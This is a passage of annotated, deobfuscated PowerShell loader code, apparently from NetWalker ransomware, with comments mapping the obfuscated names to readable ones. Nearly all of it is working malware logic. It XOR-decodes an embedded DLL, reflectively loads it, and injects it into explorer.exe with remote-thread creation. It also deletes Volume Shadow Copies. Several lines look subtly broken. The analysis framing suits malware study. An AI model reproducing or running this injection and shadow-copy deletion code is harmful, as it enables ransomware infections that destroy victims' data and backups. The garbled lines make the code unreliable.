0x04 ) # PAGE_READWRITE
if ( $ptr_allocated_memory_SizeOfImage -ne 0 )
{
# TnpZEgU = current_process
$current_process = $imported_winapi_functions::GetCurrentProcess_ptr()
# axcqEfGfjnHcK = write_process_memory_return_value_SizeOfImage
$write_process_memory_return_value_SizeOfImage = $imported_winapi_functions::WriteProcessMemory_ptr(
$current_process,
$ptr_allocated_memory_SizeOfImage,
$ptr_allocated_memory,
$nt_header_32or64.OptionalHeader.SizeOfImage,
[ref]([UInt32]0 ) )
if ( $write_process_memory_return_value_SizeOfImage -eq $true )
{
# MbJzZADaCvmWaeWol = ptr_allocated_memory
$ptr_allocated_memory2 = $imported_winapi_functions::VirtualAllocEx_ptr(
[IntPtr]$process_handle,
0,
$nt_header_32or64.OptionalHeader.SizeOfImage,
0x00001000 -bor 0x00002000,
0x40 ) #PAGE_EXECUTE_READWRITE
if ( $ptr_allocated_memory2 -ne 0 )
{
# RyDGw = dos_header
$dos_header = [System.Runtime.InteropServices.Marshal]::PtrToStructure(
$ptr_allocated_memory_SizeOfImage,
[Type][c_sharp_namespace.IMAGE_DOS_HEADER])
$nt_header_32or64 = 0
if ( $flag_64_bit -eq $true )
{
# lBiNAwTFUnSVeM = nt_header_32or64
$nt_header_32or64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure(
$(Add-SignedIntAsUnsigned
$ptr_allocated_memory_SizeOfImage $(convert_to_int_64 $dos_header.e_lfanew)),
[Type][c_sharp_namespace.IMAGE_NT_HEADERS64] )
}
else
{
$nt_header_32or64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure(
$(Add-SignedIntAsUnsigned $ptr_allocated_memory_SizeOfImage $(convert_to_int_64 $dos_header.e_lfanew))
, [Type][c_sharp_namespace.IMAGE_NT_HEADERS32] )
}
Update-MemoryAddresses $ptr_allocated_memory_SizeOfImage $ptr_allocated_memory2 $nt_header_32or64.OptionalHeader.BaseRelocationTable.VirtualAddress $(convert_to_int_64 $nt_header_32or64.OptionalHeader.ImageBase )
$write_process_memory_return_value_SizeOfImage = $imported_winapi_functions::WriteProcessMemory_ptr(
$process_handle,
$ptr_allocated_memory2,
$ptr_allocated_memory_SizeOfImage,
$nt_header_32or64.OptionalHeader.SizeOfImage,
[ref]([UInt32]0 ) )
if ( $write_process_memory_return_value_SizeOfImage -eq $true )
{
# VNeGiJ = offset_AddressOfEntryPoint
$offset_AddressOfEntryPoint = Add-SignedIntAsUnsigned $ptr_allocated_memory2 $( convert_to_int_64 ( $nt_header_32or64.OptionalHeader.AddressOfEntryPoint ) )
# IrRGNCjoBT = handle_malware_thread
$handle_malware_thread = $imported_winapi_functions::CreateRemoteThread_ptr(
$process_handle,
0,
0,
$offset_AddressOfEntryPoint, # LPTHREAD_START_ROUTINE lpStartAddress,
0,
0,
0 )
if ( $handle_malware_thread -ne 0 )
{
$local_return_flag.value = $true
}
}
}
}
$imported_winapi_functions::VirtualFree_ptr( $ptr_allocated_memory_SizeOfImage, ([UInt32]0), 0x00008000 ) | Out-Null
}
$imported_winapi_functions::CloseHandle_ptr( $process_handle ) | Out-Null
}
return
}
function search_process # qvGPA
{
param
(
[Parameter(Position = 0 , Mandatory = $true)] [string] $string_explorer, # MfBuC
[Parameter(Position = 1 , Mandatory = $true)] [IntPtr] $ptr_allocated_memory, # LAll
[Parameter(Position = 2 , Mandatory = $true)] [UInt32] $nt_header_32or64.OptionalHeader.SizeOfImage, # hlzkcQdJYWglzbEHisN
[Parameter(Position = 3 , Mandatory = $true)] [UInt32] $nt_header_32or64.OptionalHeader.AddressOfEntryPoint, # JWFzvbZwhyTlyFTO,
[Parameter(Position = 4 , Mandatory = $true)] [bool] $flag_64_bit, #RkpY
[Parameter(Position = 5 , Mandatory = $true)] [ref] $return_flag #NkDrjvaICuTHrzcLMvIE
)
$return_flag.value = $false
# $dQZ = base64_decode_and_xor '6/Prqqiy+PDw' 0x9c
# $dQZ = string_wow_64_dll
string_wow_64_dll = wow64.dll
# BJzmcaQXH = process
foreach ( $process in get-process $string_explorer )
{
# ZvRfkoGB = process_id
$process_id = $process.id
if ( $flag_64_bit -eq $true )
{
$process_id = 0;
# Nfgil = flag_process_uses_wow64
$flag_process_uses_wow64 = $false
# ssDIsaHtuqLKDeaGvE = module
foreach ( $module in $process.modules )
{
if ( $module.filename -eq $string_wow_64_dll )
{
$flag_process_uses_wow64 = $true
}
}
if ( $flag_process_uses_wow64 -eq $false )
{
$process_id = $process.id
}
}
if ( $process_id -ne 0 )
{
if ( $process.mainwindowhandle -ne 0 )
# Only fire for if victim has a GUI
{
$local_return_flag = 0
malware_create_remote_thread $process_id $ptr_allocated_memory $nt_header_32or64.OptionalHeader.SizeOfImage $$nt_header_32or64.OptionalHeader.AddressOfEntryPoint $flag_64_bit ([ref]$local_return_flag)
if ( [bool]$local_return_flag -eq $true )
{
$return_flag.value = $true
break
}
}
}
}
return
}
[byte[]]$decoded_netwalker_arch_suitable_dll = 0
$flag_64_bit = $false
# $vGKTsfLUeCgH = base64_decode_and_xor 'KEdldC1XbWlP...' 0x00
# $vGKTsfLUeCgH = '(Get-WmiObject -Class Win32_OperatingSystem | Select-Object OSArchitecture -ErrorAction Stop).OSArchitecture'
# vGKTsfLUeCgH = get_os_arch
$get_os_arch = Invoke-Expression '(Get-WmiObject -Class Win32_OperatingSystem | Select-Object OSArchitecture -ErrorAction Stop).OSArchitecture'
# $DnxXXvA = base64_decode_and_xor 'moaEmg==' 0xb0
#$DnxXXvA = string_64
<# Decode arch suitable DLL #>
if ( $get_os_arch -like "*64*" )
{
# $HoSjWB = base64_decode_and_xor 'IS0kdnQ=' 0x40
# $HoSjWB = amd64
if ( $env:PROCESSOR_ARCHITECTURE -ne "amd64" ) <# kills attack if os arch has *64* but processor arch != amd64 #>
{
#$JXmjXQsQ = base64_decode_and_xor 'CSYsJjs0ITwjMAkiPDsxOiImJToiMCcmPTA5OQkjZHtlCSU6IjAnJj0wOTl7MC0w' 0x55
#$JXmjXQsQ = path_to_powershell
$path_to_powershell = \sysnative\windowspowershell\v1.0\powershell.exe
<# skipped, myInvocation.Line not declared #>
if ($myInvocation.Line)
{
&"$env:WINDIR$path_to_powershell" -ExecutionPolicy ByPass -NoLogo -NonInteractive -NoProfile -NoExit $myInvocation.Line
}
else
{
&"$env:WINDIR$path_to_powershell" -ExecutionPolicy ByPass -NoLogo -NonInteractive -NoProfile -NoExit -file "$($myInvocation.InvocationName)" $args
}
exit $lastexitcode
}
# $sODYqXdgNRiIZcVP = iterator
for( $ = 0; $iterator -lt $netwalker_64bit_dll.Length; $iterator++ )
{
$netwalker_64bit_dll[$iterator] = $netwalker_64bit_dll[$iterator] -bxor 0x71 <# XOR key for 64bit DLL = 0x71 #>
}
# [byte[]]$PhgTEOPwcrzNn = $netwalker_64bit_dll
# $PhgTEOPwcrzNn = decoded_netwalker_arch_suitable_dll
[byte[]]$decoded_netwalker_arch_suitable_dll = $netwalker_64bit_dll
# $VnzyvGjTysySn = $true
# VnzyvGjTysySn = flag_64_bit
$flag_64_bit = $true
}
else
{
for( $WGP = 0; $WGP -lt $netwalker_32bit_dll.Length; $WGP++ )
{
$netwalker_32bit_dll[$WGP] = $netwalker_32bit_dll[$WGP] -bxor 0xae <# XOR key for 32bit DLL = 0xae #>
}
# [byte[]]$PhgTEOPwcrzNn = $netwalker_32bit_dll
# $PhgTEOPwcrzNn = decoded_netwalker_arch_suitable_dll
[byte[]]$decoded_netwalker_arch_suitable_dll = $netwalker_32bit_dll
}
[System.IntPtr]$ptr_loaded_malware = 0
[System.IntPtr]$ptr_allocated_memory = 0
# $gzvuNDnbub = $imported_winapi_functions::GetCurrentProcess_ptr()
# $gzvuNDnbub = current_process
$current_process = $imported_winapi_functions::GetCurrentProcess_ptr()
try
{
# $NzmbiEzWGkPTb = [System.Runtime.InteropServices.Marshal]::AllocHGlobal( $decoded_netwalker_arch_suitable_dll.Length )
# $NzmbiEzWGkPTb = ptr_loaded_malware
$ptr_loaded_malware = [System.Runtime.InteropServices.Marshal]::AllocHGlobal( $decoded_netwalker_arch_suitable_dll.Length ) # Allocation
[System.Runtime.InteropServices.Marshal]::Copy( $decoded_netwalker_arch_suitable_dll, 0, $ptr_loaded_malware, $decoded_netwalker_arch_suitable_dll.Length ) # DLL copied
}
catch
{
return
}
# $ARAgiHjvjNUXTks = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ptr_loaded_malware,[Type][c_sharp_namespace.IMAGE_DOS_HEADER])
# $ARAgiHjvjNUXTks = dos_header
$dos_header = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ptr_loaded_malware,[Type][c_sharp_namespace.IMAGE_DOS_HEADER])
$nt_header_32or64 = 0
if ( $flag_64_bit -eq $true )
{
# $PJSui = [System.Runtime...
# $PJSui = nt_header_32or64
$nt_header_32or64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure(
$(Add-SignedIntAsUnsigned $ptr_loaded_malware $(convert_to_int_64 $dos_header.e_lfanew)),
[Type][c_sharp_namespace.IMAGE_NT_HEADERS64] )
}
else
{
# $PJSui = [System.Runtime...
# $PJSui = nt_header_32or64
$nt_header_32or64 = [System.Runtime.InteropServices.Marshal]::PtrToStructure(
$(Add-SignedIntAsUnsigned $ptr_loaded_malware $(convert_to_int_64 $dos_header.e_lfanew)),
[Type][c_sharp_namespace.IMAGE_NT_HEADERS32] )
}
# $TVJDqmVERWgILwjbrzXh = ptr_allocated_memory
$ptr_allocated_memory = $imported_winapi_functions::VirtualAlloc_ptr(
0, # Start Address (lpAddress)
$nt_header_32or64.OptionalHeader.SizeOfImage, # Size to allocate (dwSize)
0x00001000 -bor 0x00002000, # MEM_COMMIT | MEM_RESERVE (flAllocationType)
0x04 ) # PAGE_READWRITE (flProtect)
if( $ptr_allocated_memory -eq 0 )
{
return
}
# $aDAaUTawwz = write_process_memory_return_value
$write_process_memory_return_value = $imported_winapi_functions::WriteProcessMemory_ptr( $current_process, $ptr_allocated_memory, $ptr_loaded_malware, $nt_header_32or64.OptionalHeader.usf, [ref]([UInt32]0) )
if ( $write_process_memory_return_value -eq $false )
{
return
}
#$iJQvOLZT = long_file_address_new_exe
$long_file_address_new_exe = $( Add-SignedIntAsUnsigned $ptr_loaded_malware $( convert_to_int_64 $dos_header.e_lfanew ) )
if ( $flag_64_bit -eq $true )
{
$long_file_address_new_exe = Add-SignedIntAsUnsigned $long_file_address_new_exe $( [System.Runtime.InteropServices.Marshal]::SizeOf( [Type][c_sharp_namespace.IMAGE_NT_HEADERS64] ) )
}
else
{
$long_file_address_new_exe = Add-SignedIntAsUnsigned $long_file_address_new_exe $( [System.Runtime.InteropServices.Marshal]::SizeOf( [Type][c_sharp_namespace.IMAGE_NT_HEADERS32] ) )
}
# $vTcsS = iterator
for( $iterator = 0; $iterator -lt $nt_header_32or64.IMAGE_FILE_HEADER_32or64.NumberOfSections; $iterator++ )
{
# kvfSlMRDhOwwCfRa = section_header
$section_header = [System.Runtime.InteropServices.Marshal]::PtrToStructure( $long_file_address_new_exe,[Type][c_sharp_namespace.IMAGE_SECTION_HEADER] )
# $sYT = loaded_PointerToRawData
$loaded_PointerToRawData = Add-SignedIntAsUnsigned $ptr_loaded_malware $( convert_to_int_64 $section_header.PointerToRawData )
# $LZwGLGsJzFaPXFSCn = loaded_VirtualAddress
$loaded_VirtualAddress = Add-SignedIntAsUnsigned $ptr_allocated_memory $( convert_to_int_64 $section_header.VirtualAddress )
$write_process_memory_return_value = $imported_winapi_functions::WriteProcessMemory_ptr( $current_process, $loaded_VirtualAddress, $loaded_PointerToRawData, $section_header.SizeOfRawData, [ref]([UInt32]0 ) )
if ( $write_process_memory_return_value -eq $false )
{
return
}
$long_file_address_new_exe = Add-SignedIntAsUnsigned $long_file_address_new_exe $([System.Runtime.InteropServices.Marshal]::SizeOf([Type][c_sharp_namespace.IMAGE_SECTION_HEADER]))
}
$return_flag = 0
# qvGPA $(base64_decode_and_xor 'ITw0KCs2ITY=' 0x44 ) $ptr_allocated_memory $nt_header_32or64.OptionalHeader.SizeOfImage $nt_header_32or64.OptionalHeader.AddressOfEntryPoint $flag_64_bit ([ref]$return_flag)
# qvGPA = search_rpocess
search_process "explorer" $ptr_allocated_memory $nt_header_32or64.OptionalHeader.SizeOfImage $nt_header_32or64.OptionalHeader.AddressOfEntryPoint $flag_64_bit ([ref]$return_flag)
if( [bool]$return_flag -ne $true )
{
# Only fires if remote thread created
# rWPEu = lpflOldProtect
[UInt32]$lpflOldProtect = 0
# dpWn = virtual_protect_return_value
$virtual_protect_return_value = $imported_winapi_functions::VirtualProtectEx_ptr(
$current_process,
$ptr_allocated_memory,
$nt_header_32or64.OptionalHeader.SizeOfImage,
0x40, # PAGE_EXECUTE_READWRITE
[ref]$lpflOldProtect )
if ( $virtual_protect_return_value -eq $true )
{
Update-MemoryAddresses $ptr_allocated_memory $ptr_allocated_memory $nt_header_32or64.OptionalHeader.BaseRelocationTable.VirtualAddress $(convert_to_int_64 $nt_header_32or64.OptionalHeader.ImageBase)
# rkjPrPDxzxrNPLti = offset_allocated_to_struct5or6_offset16
$offset_allocated_to_struct5or6_offset16 = Add-SignedIntAsUnsigned $ptr_allocated_memory $( convert_to_int_64 ( $nt_header_32or64.OptionalHeader.AddressOfEntryPoint ) )
# mgHOUd = dynamic_assembly
dynamic_assembly = Get-DelegateType @([System.IntPtr],[UInt32],[System.IntPtr]) ([bool])
# IKwObj = ptr_delegate
$ptr_delegate= [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer( $offset_allocated_to_struct5or6_offset16, $dynamic_assembly )
$ptr_delegate.Invoke( 0, 0, 0 ) | Out-Null
}
}
# $YHrtFHtwjykGZRfRzNj = base64_decode_and_xor 'UXNiO0F7f1l0fHN1YjZBf3glJElFfndyeWF1eWZvNmo2UHlkU3d1fjtZdHxzdWI2bTJJOFJzenNicz4/LWs2ajZZY2I7WGN6eg==' 0x16
# YHrtFHtwjykGZRfRzNj = string_shadow_copy
$string_shadow_copy = "Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} | Out-Null"
$string_shadow_copy | Invoke-Expression
$imported_winapi_functions::VirtualFree_ptr($ptr_allocated_memory,([UInt32]0),0x00008000) | Out-Null
$imported_winapi_functions::CloseHandle_ptr($current_process) | Out-Null